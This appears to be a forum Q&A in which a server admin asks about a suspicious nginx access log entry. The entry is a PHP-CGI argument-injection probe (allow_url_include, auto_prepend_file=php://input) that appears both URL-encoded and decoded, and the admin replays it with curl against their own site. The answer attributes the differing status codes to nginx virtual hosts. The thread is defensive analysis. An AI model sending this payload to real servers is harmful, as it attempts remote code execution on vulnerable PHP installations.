0

This question may be related to this: https://stackoverflow.com/questions/39097554/how-do-i-prevent-code-injection-attack-on-nginx - though my problem is slightly different.

Also this question seems similar though asking different thing: Strange URL requests via Nginx on Ubuntu 14.04, what is the malicious user trying to do?

I came accross weird log line in my nginx access.log:

xxx.xxx.xxx.xxx - - [24/Aug/2016:05:49:59 +0100] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "-"

So if I take whole this URL and decode it I get this:

//cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

So somebody is clearly trying something dodgy here which I don't quite understand because I'm running python, not php application. I would love to understand what is happening here.

If I try to test it on one of my deployments like this:

curl -X POST http://my.site.example.com//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

I get:

The resource could not be found.
/cgi-bin/php

Though access log is a bit different:

xxx.xxx.xxx.xxx - - [24/Aug/2016:15:05:11 +0100] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 164 "-" "curl/7.50.1"

The error code is 404 - not 301.

I cannot find out how attacker managed to get 301 instead of 404?

Greg0ry
  • 87
  • 1
  • 12
  • evidence of the PHP-CGI attack vector: see https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--More-PHP-CGI-Scanning-(apache-magika-c)/ ...people are recommending (to upgrade PHP if installed) or deploy Web Application firewall(WAF). – Sachin Singh Aug 24 '16 at 13:17

1 Answers1

1

This is only a guess, since there is no information on your nginx configuration.

You are making the CURL request to http://my.site.example.com. However, the attacker could have made the request to http://ip.address.

Therefore the requests might have hit different virtual servers in nginx configuration, and therefore the responses are different.

In order to give more accurate answer, we need to see the complete nginx configuration.

Tero Kilkanen
  • 34,499
  • 3
  • 38
  • 58
  • That was it, attacker tired IP rather than domain. When I use IP within curl I get the same 301 HTTP error code. Thanks. – Greg0ry Aug 24 '16 at 14:58